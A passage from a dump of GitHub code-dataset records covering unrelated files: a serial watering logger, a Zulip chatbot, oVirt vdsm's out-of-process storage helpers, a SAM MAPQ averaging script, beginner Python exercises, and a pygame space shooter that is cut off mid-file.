\"/dev/ttyACM0\"\nfile_name = \"watering.csv\"\n\nimport serial\nimport io\nimport time\n\ns = serial.Serial(port_name)\nf = open(file_name,\"a\");\nrunning = True\n\nwhile running:\n v = s.readline().decode().strip()\n date = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n f.write(date)\n f.write(\",\")\n f.write(v)\n f.write(\"\\n\")\n f.flush()\n\n print(v)\n\n\n","repo_name":"fortega/watering","sub_path":"watering.py","file_name":"watering.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27868254840","text":"import pprint\nimport zulip\nimport sys\nimport re\nimport json\nimport httplib2\nimport os\nfrom chatterbot import ChatBot\nfrom currency import curr\n#from lat_lon import latlon\nfrom language import Lang\nfrom restaurants import Rest\nfrom bus_stations import Bus\nfrom tourist_places import Tour\nfrom autocorrect import spell\nfrom jobs import Job\nfrom directions import Direct\nfrom atm import Atm\n#from autocorrect 
import spell\n#from trainers import UbuntuCorpusTrainer\np = pprint.PrettyPrinter()\nBOT_MAIL = \"i-bot@rhtp.zulipchat.com\"\n\ndef dhelp():\n\tmessage = \"**Welcome to I-BOT**\\nIBOT has various subfields\\nType `ibot help ` to get help for specific subfield.\\n\"\n\tmessage += \"\\n**Subfields**\\n\"\n\tmessage += \"`currency` - Get currency conversion rate\\n\"\n\tmessage += \"`atm` - Get addresses of nearby ATM(s)\\n\"\n\tmessage += \"`restaurant` - Get addresses of nearby restaurant(s)\\n\"\n\tmessage += \"`bus` - Get addresses of nearest bus stand(s)\\n\"\n\tmessage += \"`tourist` - Get addresses of nearby tourist place(s)\\n\"\n\tmessage += \"`job` - Get a list of jobs available nearby\\n\"\n\tmessage += \"`direction` - Get directions from one place to other\\n\"\n\tmessage += \"`language` - Translate your English sentences to other languages\\n\"\n\tmessage += \"\\nIf you're bored Talk to IBOT, it will supercharge you\"\n\treturn message\n\nclass ZulipBot(object):\n\tdef __init__(self):\n\t\tself.client = zulip.Client(site=\"https://rhtp.zulipchat.com/api/\")\n\t\tself.subscribe_all()\n\t\tself.chatbot = ChatBot(\"Test\", trainer='chatterbot.trainers.ChatterBotCorpusTrainer')\n\t\t#self.chatbot.train(\"chatterbot.corpus.english\")\n\t\t#self.chatbot.train(\"chatterbot.corpus.english.greetings\")\n\t\t#self.chatbot.train(\"chatterbot.corpus.english.conversations\")\n\t\tself.currency = curr()\n\t\t#self.lat_lon = latlon()\n\t\tself.language = Lang()\n\t\tself.restaurants = Rest()\n\t\tself.bus_stations = Bus()\n\t\tself.tourist_places = Tour()\n\t\tself.jobs = Job()\n\n\t\tself.directions = Direct()\n\t\tself.atm = Atm()\n\t\tself.subkeys = [\"currency\", \"language\", \"restaurant\", \"bus\", \"tourist\", \"job\", \"direction\",\"atm\"]\n\t\t#mesg = dhelp()\n\t\t#self.client.send_message({\n\t\t#\t\"type\": \"stream\",\n\t\t#\t\"content\" : self.mesg\n\t\t#\t})\n\n\tdef urls(self, link):\n\t\turls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', link)\n\t\treturn urls\n\n\tdef subscribe_all(self):\n\t\tjson = self.client.get_streams()[\"streams\"]\n\t\tstreams = [{\"name\": stream[\"name\"]} for stream in json]\n\t\tself.client.add_subscriptions(streams)\n\n\tdef help(self):\n\t\tmessage = \"**Welcome to I-BOT**\\nIBOT has various subfields\\nType `ibot help ` to get help for specific subfield.\\n\"\n\t\tmessage += \"\\n**Subfields**\\n\"\n\t\tmessage += \"`currency` - Get currency conversion rate\\n\"\n\t\tmessage += \"`atm` - Get addresses of nearby ATM(s)\\n\"\n\t\tmessage += \"`restaurant` - Get addresses of nearby restaurant(s)\\n\"\n\t\tmessage += \"`bus` - Get addresses of nearest bus stand(s)\\n\"\n\t\tmessage += \"`tourist` - Get addresses of nearby tourist place(s)\\n\"\n\t\tmessage += \"`job` - Get a list of jobs available nearby\\n\"\n\t\tmessage += \"`direction` - Get directions from one place to other\\n\"\n\t\tmessage += \"`language` - Translate your English sentences to other languages\\n\"\n\t\tmessage += \"\\nIf you're bored Talk to IBOT, it will supercharge you\"\n\t\treturn message\n\tdef help_sub(self, key):\n\t\tkey = key.lower()\n\t\tmessage = \"**Usage**\\n\"\n\t\tif key == \"currency\":\n\t\t\tmessage += \"`ibot currency from to ` - To get currency conversion rate.\\n\"\n\t\telif key == \"atm\":\n\t\t\tmessage += \"`ibot atm ` - To get addresses of nearby ATM(s).\\n\"\n\t\telif key == \"restaurant\":\n\t\t\tmessage += \"`ibot restaurant ` - To get addresses of nearby restaurant(s).\\n\"\n\t\telif key == 
\"bus\":\n\t\t\tmessage += \"`ibot bus ` - To get addresses of nearby bus stand(s).\\n\"\n\t\telif key == \"tourist\":\n\t\t\tmessage += \"`ibot tourist ` - To get addresses of nearby tourist place(s).\\n\"\n\t\telif key == \"job\":\n\t\t\tmessage += \"`ibot job ` - To get a list of jobs available nearby.\\n\"\n\t\telif key == \"direction\":\n\t\t\tmessage += \"`ibot direction from to ` - To get directions from one place to another.\\n\"\n\t\telif key == \"language\":\n\t\t\tmessage += \"`ibot language to ` - To translate your English sentences to other languages.\\n\"\n\t\telse:\n\t\t\tmessage = self.help()\n\t\t\tmessage += \"\\n{} is not a valid subfield\\n\".format(key)\n\t\treturn message\t\t\n\n\tdef process(self, msg):\n\t\tcontent = msg[\"content\"].split()\n\t\tsender_email = msg[\"sender_email\"]\n\t\tttype = msg[\"type\"]\n\t\tstream_name = msg['display_recipient']\n\t\tstream_topic = msg['subject']\n\n\t\tprint(content)\n\t\tl = len(content)\n#\t\ttemstr = spell(content[1].lower())\n#\t\tcontent[1] = temstr\n#\t\tprint(content[1])\n\t\tif sender_email == BOT_MAIL:\n\t\t\treturn \n\n\t\tprint(\"doing\")\n\n\t\tif content[0].lower() == \"ibot\" or content[0] == \"@**IBOT**\":\n\t\t\tif content[1].lower() == \"currency\":\n\t\t\t\tmessage = self.currency.curfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"latilongi\":\n\t\t\t\tmessage = self.lat_lon.latlonfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"language\":\n\t\t\t\tmessage = self.language.langconvert(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"restaurant\":\n\t\t\t\tmessage = self.restaurants.restfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"bus\":\n\t\t\t\tmessage = self.bus_stations.busfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"tourist\":\n\t\t\t\tmessage = self.tourist_places.tourfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"job\":\n\t\t\t\tmessage = self.jobs.jobfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == 
\"atm\":\n\t\t\t\tmessage = self.atm.atmfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"direction\":\n\t\t\t\tmessage = self.directions.directfun(content)\n\t\t\t\t#print(message)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\" : msg[\"subject\"],\n\t\t\t\t\t\"to\" : msg[\"display_recipient\"],\n\t\t\t\t\t\"content\" : message\n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"help\" and len(content) == 2:\n\t\t\t\tmessage = self.help()\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\": msg[\"subject\"],\n\t\t\t\t\t\"to\": msg[\"display_recipient\"],\n\t\t\t\t\t\"content\": message \n\t\t\t\t\t})\n\t\t\tif content[1].lower() == \"help\" and len(content) > 2:\n\t\t\t\tsubkey = content[2]\n\t\t\t\tmessage = self.help_sub(subkey)\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\": msg[\"subject\"],\n\t\t\t\t\t\"to\": msg[\"display_recipient\"],\n\t\t\t\t\t\"content\": message \n\t\t\t\t\t})\n \n\t\t\tif content[1] not in self.subkeys:\n\t\t\t\tip = content[1:]\n\t\t\t\tip = \" \".join(ip)\n\t\t\t\tmessage = self.chatbot.get_response(ip).text\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\": msg[\"subject\"],\n\t\t\t\t\t\"to\": msg[\"display_recipient\"],\n\t\t\t\t\t\"content\": message\n\t\t\t\t\t})\n \n\t\tif self.urls(\" \".join(content)):\n\t\t\tsummary = self.w.wiki(\" \".join(content))\n\t\t\tif summary:\n\t\t\t\tself.client.send_message({\n\t\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\t\"subject\": msg[\"subject\"],\n\t\t\t\t\t\"to\": msg[\"display_recipient\"],\n\t\t\t\t\t\"content\": summary\n\t\t\t\t\t})\n\t\telif \"ibot\" in content and content[0] != \"ibot\":\n\t\t\tself.client.send_message({\n\t\t\t\t\"type\": \"stream\",\n\t\t\t\t\"subject\": msg[\"subject\"],\n\t\t\t\t\"to\": msg[\"display_recipient\"],\n\t\t\t\t\"content\": \"Alas! Finally you called me :blush:\"\n\t\t\t\t})\n\t\telse:\n\t\t\treturn\n\ndef main():\n\tbot = ZulipBot()\n\tbot.client.call_on_each_message(bot.process)\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tprint(\"Thanks for using IBOT. 
Bye!\")\n\t\tsys.exit(0)\n\n","repo_name":"prankuragarwal/Red_Hot_Techie_Pepper","sub_path":"ibot/mainbot.py","file_name":"mainbot.py","file_ext":"py","file_size_in_byte":8767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"70573934087","text":"from __future__ import absolute_import\n\nimport errno\nimport grp\nimport logging\nimport os\nimport stat\nimport threading\nimport types\nimport weakref\n\nfrom functools import partial\nimport six\n\nimport ioprocess\n\nfrom vdsm import constants\nfrom vdsm import utils\nfrom vdsm.common.osutils import get_umask\nfrom vdsm.config import config\nfrom vdsm.storage import constants as sc\nfrom vdsm.storage import exception as se\n\nDEFAULT_TIMEOUT = config.getint(\"irs\", \"process_pool_timeout\")\nIOPROC_IDLE_TIME = config.getint(\"irs\", \"max_ioprocess_idle_time\")\nHELPERS_PER_DOMAIN = config.getint(\"irs\", \"process_pool_max_slots_per_domain\")\nMAX_QUEUED = config.getint(\"irs\", \"process_pool_max_queued_slots_per_domain\")\n\n_procPoolLock = threading.Lock()\n_procPool = {}\n_refProcPool = {}\n\nelapsed_time = lambda: os.times()[4]\n\nlog = logging.getLogger('storage.oop')\n\n\ndef stop():\n \"\"\"\n Called during application shutdown to close all running ioprocesses.\n\n Tests using oop should call this to ensure that stale ioprocess are not\n left when a tests ends.\n \"\"\"\n with _procPoolLock:\n for name, (eol, proc) in _procPool.items():\n log.debug(\"Closing ioprocess %s\", name)\n try:\n proc._ioproc.close()\n except Exception:\n log.exception(\"Error closing ioprocess %s\", name)\n _procPool.clear()\n _refProcPool.clear()\n\n\ndef cleanIdleIOProcesses(clientName):\n now = elapsed_time()\n for name, (eol, proc) in list(six.iteritems(_procPool)):\n if (eol < now and name != clientName):\n log.debug(\"Removing idle ioprocess %s\", name)\n del _procPool[name]\n\n\ndef getProcessPool(clientName):\n with _procPoolLock:\n cleanIdleIOProcesses(clientName)\n\n proc = _refProcPool.get(clientName, lambda: None)()\n if proc is None:\n log.debug(\"Creating ioprocess %s\", clientName)\n proc = ioprocess.IOProcess(max_threads=HELPERS_PER_DOMAIN,\n timeout=DEFAULT_TIMEOUT,\n max_queued_requests=MAX_QUEUED,\n name=clientName)\n proc = _IOProcWrapper(\"oop\", proc)\n _refProcPool[clientName] = weakref.ref(proc)\n\n _procPool[clientName] = (elapsed_time() + IOPROC_IDLE_TIME, proc)\n return proc\n\n\nclass _IOProcessGlob(object):\n def __init__(self, iop):\n self._iop = iop\n\n def glob(self, pattern):\n return self._iop.glob(pattern)\n\n\nclass _IOProcessFileUtils(object):\n def __init__(self, iop):\n self._iop = iop\n\n def fsyncPath(self, path):\n self._iop.fsyncPath(path)\n\n def cleanupdir(self, path, ignoreErrors=True):\n cleanupdir_errors = []\n\n try:\n files = self._iop.listdir(path)\n except OSError:\n if not ignoreErrors:\n raise\n else:\n for f in files:\n fullpath = os.path.join(path, f)\n if _IOProcessOs(self._iop).path.isdir(fullpath):\n try:\n self.cleanupdir(fullpath, ignoreErrors)\n except OSError as e:\n cleanupdir_errors.append(e)\n else:\n try:\n self._iop.unlink(fullpath)\n except Exception as e:\n cleanupdir_errors.append('%s: %s' % (\"unlink\", e))\n try:\n self._iop.rmdir(path)\n except Exception as e:\n cleanupdir_errors.append('%s: %s' % (\"rmdir\", e))\n\n if not ignoreErrors and cleanupdir_errors:\n raise se.MiscDirCleanupFailure(\"%s %s\" % (path, cleanupdir_errors))\n\n def copyUserModeToGroup(self, path):\n mode = _IOProcessOs(self._iop).stat(path).st_mode\n 
userMode = mode & 0o700 # user mode mask\n newGroupMode = userMode >> 3\n if (mode & 0o070) != newGroupMode: # group mode mask\n # setting the new group mode masking out the original one\n newMode = (mode & 0o707) | newGroupMode\n log.debug(\"Changing mode for %s to %#o\", path, newMode)\n _IOProcessOs(self._iop).chmod(path, newMode)\n\n def createdir(self, path, mode=None):\n parts = path.split(\"/\")\n tmpPath = \"\"\n for part in parts:\n tmpPath = os.path.join(tmpPath, part)\n if tmpPath == \"\":\n tmpPath = \"/\"\n\n try:\n if mode:\n self._iop.mkdir(tmpPath, mode)\n else:\n self._iop.mkdir(tmpPath)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n statinfo = self._iop.stat(tmpPath)\n if not stat.S_ISDIR(statinfo.st_mode):\n raise OSError(errno.ENOTDIR,\n \"Not a directory %s\" % tmpPath)\n if tmpPath == path and mode is not None:\n actual_mode = stat.S_IMODE(statinfo.st_mode)\n expected_mode = mode & ~get_umask()\n if actual_mode != expected_mode:\n raise OSError(\n errno.EPERM,\n \"Existing {} permissions {:o} are not as requested\"\n \" {:o}\".format(path, actual_mode, expected_mode))\n\n def padToBlockSize(self, path):\n size = _IOProcessOs(self._iop).stat(path).st_size\n newSize = utils.round(size, sc.BLOCK_SIZE_4K)\n log.debug(\"Truncating file %s to %d bytes\", path, newSize)\n truncateFile(self._iop, path, newSize)\n\n def validateAccess(self, targetPath, perms=(os.R_OK | os.W_OK | os.X_OK)):\n if not self._iop.access(targetPath, perms):\n log.warning(\"Permission denied for directory: %s with permissions:\"\n \"%s\", targetPath, perms)\n raise OSError(errno.EACCES, os.strerror(errno.EACCES))\n\n def pathExists(self, filename, writable=False):\n return self._iop.pathExists(filename, writable)\n\n def validateQemuReadable(self, targetPath):\n \"\"\"\n Validate that qemu process can read file\n \"\"\"\n gids = (grp.getgrnam(constants.DISKIMAGE_GROUP).gr_gid,\n grp.getgrnam(constants.METADATA_GROUP).gr_gid)\n st = _IOProcessOs(self._iop).stat(targetPath)\n if not (st.st_gid in gids and st.st_mode & stat.S_IRGRP or\n st.st_mode & stat.S_IROTH):\n raise OSError(errno.EACCES, os.strerror(errno.EACCES))\n\n\nclass _IOProcessOs(object):\n def __init__(self, iop):\n self._iop = iop\n self.path = _IOProcessOs.Path(iop)\n\n def access(self, path, perms):\n return self._iop.access(path, perms)\n\n def chmod(self, path, mode):\n self._iop.chmod(path, mode)\n\n def link(self, src, dst):\n self._iop.link(src, dst)\n\n def mkdir(self, path, mode=None):\n if mode is not None:\n self._iop.mkdir(path, mode)\n else:\n self._iop.mkdir(path)\n\n def remove(self, path):\n self._iop.unlink(path)\n\n def rename(self, oldpath, newpath):\n self._iop.rename(oldpath, newpath)\n\n def rmdir(self, path):\n self._iop.rmdir(path)\n\n def stat(self, path):\n return self._iop.stat(path)\n\n def statvfs(self, path):\n return self._iop.statvfs(path)\n\n def unlink(self, path):\n return self._iop.unlink(path)\n\n class Path(object):\n def __init__(self, iop):\n self._iop = iop\n\n def isdir(self, path):\n try:\n res = self._iop.stat(path)\n except OSError as e:\n if e.errno == errno.ENOENT:\n return False\n else:\n raise\n else:\n return stat.S_ISDIR(res.st_mode)\n\n def islink(self, path):\n # Note: islink does not follow symlinks. 
This is not documented\n # explicitly, but it does not make sense otherwise.\n try:\n res = self._iop.lstat(path)\n except OSError as e:\n if e.errno == errno.ENOENT:\n return False\n else:\n raise\n else:\n return stat.S_ISLNK(res.st_mode)\n\n def lexists(self, path):\n return self._iop.lexists(path)\n\n def exists(self, path):\n return self._iop.pathExists(path, False)\n\n\nclass _IOProcessUtils(object):\n def __init__(self, iop):\n self._iop = iop\n\n def forceLink(self, src, dst):\n \"\"\" Makes or replaces a hard link.\n\n Like os.link() but replaces the link if it exists.\n \"\"\"\n try:\n _IOProcessOs(self._iop).link(src, dst)\n except OSError as e:\n if e.errno == errno.EEXIST:\n self.rmFile(dst)\n _IOProcessOs(self._iop).link(src, dst)\n else:\n log.error(\"Linking file: %s to %s failed\", src, dst,\n exc_info=True)\n raise\n\n def rmFile(self, path):\n \"\"\"\n Try to remove a file.\n\n If the file doesn't exist it's assumed that it was already removed.\n \"\"\"\n try:\n _IOProcessOs(self._iop).unlink(path)\n except OSError as e:\n if e.errno == errno.ENOENT:\n log.warning(\"File: %s already removed\", path)\n else:\n log.error(\"Removing file: %s failed\", path, exc_info=True)\n raise\n\n\ndef readLines(ioproc, path):\n return ioproc.readlines(path)\n\n\ndef writeLines(ioproc, path, lines):\n data = b''.join(lines)\n return writeFile(ioproc, path, data)\n\n\ndef writeFile(ioproc, path, data, direct=False):\n return ioproc.writefile(path, data, direct=direct)\n\n\ndef simpleWalk(ioproc, path):\n files = []\n for f in ioproc.listdir(path):\n fullpath = os.path.join(path, f)\n osPath = _IOProcessOs(ioproc).path\n if osPath.isdir(fullpath) and not osPath.islink(fullpath):\n files.extend(simpleWalk(ioproc, fullpath))\n else:\n files.append(fullpath)\n\n return files\n\n\ndef truncateFile(ioproc, path, size, mode=None, creatExcl=False):\n ioproc.truncate(path, size, mode if mode is not None else 0, creatExcl)\n if mode is not None:\n _IOProcessOs(ioproc).chmod(path, mode)\n\n\nclass _IOProcWrapper(types.ModuleType):\n def __init__(self, modname, ioproc):\n self._modName = modname\n self._ioproc = ioproc\n\n self.glob = _IOProcessGlob(ioproc)\n self.fileUtils = _IOProcessFileUtils(ioproc)\n self.os = _IOProcessOs(ioproc)\n self.utils = _IOProcessUtils(ioproc)\n\n self.readLines = partial(readLines, ioproc)\n self.writeLines = partial(writeLines, ioproc)\n self.writeFile = partial(writeFile, ioproc)\n self.simpleWalk = partial(simpleWalk, ioproc)\n self.truncateFile = partial(truncateFile, ioproc)\n\n def readFile(self, path, direct=False):\n return self._ioproc.readfile(path, direct=direct)\n\n def probe_block_size(self, dir_path):\n return self._ioproc.probe_block_size(dir_path)\n","repo_name":"oVirt/vdsm","sub_path":"lib/vdsm/storage/outOfProcess.py","file_name":"outOfProcess.py","file_ext":"py","file_size_in_byte":11236,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"16"} +{"seq_id":"6150528986","text":"#!/usr/bin/env python3\nimport sys\nf = open( sys.argv[1] )\n\ncount = 0\nmapq_sum= 0\nfor i, line in enumerate( f ):\n if line.startswith(\"@\"):\n continue\n fields = line.rstrip(\"\\r\\n\").split(\"\\t\")\n mapq = int(fields[4])\n count +=1\n mapq_sum += mapq\n average = mapq_sum/count\n #flag = 
fields[1]\nprint(average)","repo_name":"rpaisner/qbb2018-answers","sub_path":"day2-lunch/exercise5.py","file_name":"exercise5.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"29448939189","text":"fruits = ['apple', 'orange', 'peach']\nprices = [12, 10, 23]\nchange = [1, 'cat', 2, 'parrot', 3, 'giraffe']\n\nfor fruit in fruits:\n\tprint(f'Fruit is {fruit}')\n\nfor i in prices:\n\tprint(f\"Price is {i}\")\n\nprint(f\"Let's count to ten!\")\nfor i in range(1,11):\n\tprint(f\"{i}\")\n\nelements = []\n\nfor i in change:\n\tif i in range(0,4):\n\t\telements.append(i)\n\t\tprint(f\"{i} is added\")\n\telse:\n\t\tprint(f\"{i} is not a number\")\n\nprint(elements)\nelements.extend(prices)\nprint(f\"elements are {elements}\")\nelements.insert(1, 666)\nelements.append(666)\nprint(f\"inserted 666 as second and last items.\\n{elements}\")\nprint(f\"let's count 666s - there are {elements.count(666)} of them. (should be 2)\")\nelements.clear()\n","repo_name":"ooddaa/thehardway","sub_path":"ex32.py","file_name":"ex32.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71682739849","text":"# single level inheritance with constructor\nclass Parent:\n haircolor=\"Black\"\n def __init__(self,name,height,bloodgroup,weight):\n self.fullname=name\n self.height=height\n self.blood=bloodgroup\n self.weight=weight\n print(\"Parent constructor is ran\")\n\n def ParentDetails(self):\n print(f\"\\nName is {self.fullname}\\nHeight is {self.height}\\nBlood group is {self.blood}\\nWeight is {self.weight}\\nHair Color is {self.haircolor}\")\n\nclass Child(Parent):\n \n def __init__(self,name,height,bloodgroup,weight,age):\n self.fullname=name\n self.height=height\n self.blood=bloodgroup\n self.weight=weight\n self.age=age\n print(\"Child constructor is ran\")\n\n def ChildDetails(self):\n print(f\"\\nName is {self.fullname}\\nHeight is {self.height}\\nBlood group is {self.blood}\\nWeight is {self.weight}\\nHair Color is {self.haircolor}\\nAge is {self.age}\")\n\n\nc1=Child(\"ark\",\"6.0\",\"B+\",98)\nc1.ChildDetails()\nc1.ParentDetails()\n\np1=Parent(\"z\",3,\"o\",87)\np1.ParentDetails()","repo_name":"arkprocoder/daimond","sub_path":"python/python-oops/opps6.py","file_name":"opps6.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74901847048","text":"# Autor: Carlos Martínez\n\n# Librerías\nimport pygame\nimport random\nimport os\n\n# Configuración general del juego (tamaño de pantalla y velocidad)\nWIDTH = 800\nHEIGHT = 600\nFPS = 30\n\n# Paleta de colores\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (235, 47, 6)\nBLUE = (0, 168, 255)\nORANGE = (229, 142, 38)\n\n# Declarar la ubicación del folder donde se encuentra el juego para que funciones en cualquier\n# sistema operativo\ngameFolder = os.path.dirname(__file__)\nassetsFolder = os.path.join(gameFolder, \"img\")\nmusicFolder = os.path.join(gameFolder, \"music\")\n\n\n# Preguntar nombre al usuario para guardar High Score\ndef preguntarNombre():\n nombre = input(\n \"Listo para jugar?\\nAntes de comenzar, por favor escribe tu nombre.\\nSe utilizará para guardar tu puntuación: \")\n return nombre\n\n\n# Función para dibujar texto en la ventana del juego\nfontName = pygame.font.match_font('arial')\n\n\ndef typeText(surface, text, size, x, y):\n font = 
pygame.font.Font(fontName, size)\n textSurface = font.render(text, True, WHITE)\n textRect = textSurface.get_rect()\n textRect.midtop = (x, y)\n surface.blit(textSurface, textRect)\n\n\ndef nuevoMeteorito():\n mob = Mob()\n allSprites.add(mob)\n mobs.add(mob)\n\n\ndef dibujarBarraEscudo(ventana, x, y, porcentage):\n if porcentage < 0:\n porcentage = 0\n bLength = 100\n bHeight = 10\n border = pygame.Rect(x, y, bLength, bHeight)\n fillRect = pygame.Rect(x, y, porcentage, bHeight)\n pygame.draw.rect(ventana, BLUE, fillRect)\n pygame.draw.rect(ventana, WHITE, border, 2)\n ventana.blit(shieldImg, (10, 8))\n\n\ndef inicioJuego():\n ventana.blit(bg, bgRect)\n typeText(ventana, \"Space Shooter\", 72, WIDTH / 2, HEIGHT / 4)\n ventana.blit(btnJugar.image, btnJugar.rect)\n ventana.blit(btnHowToPlay.image, btnHowToPlay.rect)\n ventana.blit(btnHighScore.image, btnHighScore.rect)\n pygame.display.flip()\n menu = True\n while menu:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYUP:\n menu = False\n\n\ndef highScores():\n ventana.blit(bg, bgRect)\n typeText(ventana, \"High Scores\", 54, WIDTH / 2, HEIGHT / 5)\n pygame.display.flip()\n gameOver = True\n while gameOver:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYUP:\n gameOver = False\n\ndef gameOver(score):\n ventana.blit(bg, bgRect)\n typeText(ventana, \"Game Over\", 72, WIDTH / 2, HEIGHT / 4)\n typeText(ventana, \"Score: \" + str(score), 36, WIDTH / 2, HEIGHT / 2)\n typeText(ventana, \"Presiona cualquier tecla para volver a jugar!\", 20, WIDTH / 2, HEIGHT - 100)\n\n while gameOver:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYUP:\n gameOver = False\n\n\ndef mostrarVidas(ventana, x, y, vidas, img):\n for vida in range(vidas):\n imgRect = img.get_rect()\n imgRect.x = x + (imgRect.width + 5) * vida\n imgRect.y = y\n ventana.blit(img, imgRect)\n\n\n# Sprites\nclass Player(pygame.sprite.Sprite):\n # Sprite for the player\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(naveImg, (50, 38))\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = 20\n self.rect.centerx = WIDTH / 2\n self.rect.bottom = HEIGHT - 10\n self.speedX = 0\n self.speed = 15\n self.shield = 100\n self.vidas = 3\n self.display = False\n self.displayTimer = pygame.time.get_ticks()\n\n def update(self):\n # Mostrar nave\n if self.display and pygame.time.get_ticks() - self.displayTimer > 1000:\n self.display = False\n self.rect.centerx = WIDTH / 2\n self.rect.bottom = HEIGHT - 10\n self.speedX = 0\n keystate = pygame.key.get_pressed()\n # Movimiento del Sprite si se precionan las teclas izquierda o derecha(<-- o -->)\n if keystate[pygame.K_LEFT] or keystate[pygame.K_a]:\n self.speedX = -self.speed\n if keystate[pygame.K_RIGHT]:\n self.speedX = self.speed\n self.rect.x += self.speedX\n # Límites del Sprite respecto a los bordes de la pantalla\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n\n def shoot(self):\n bullet = Bullet(self.rect.centerx, self.rect.top)\n allSprites.add(bullet)\n bullets.add(bullet)\n shootSound.play()\n\n def ocultar(self):\n self.display = True\n self.displayTimer = pygame.time.get_ticks()\n self.rect.center = (WIDTH / 2, HEIGHT + 200)\n\n\nclass Mob(pygame.sprite.Sprite):\n def 
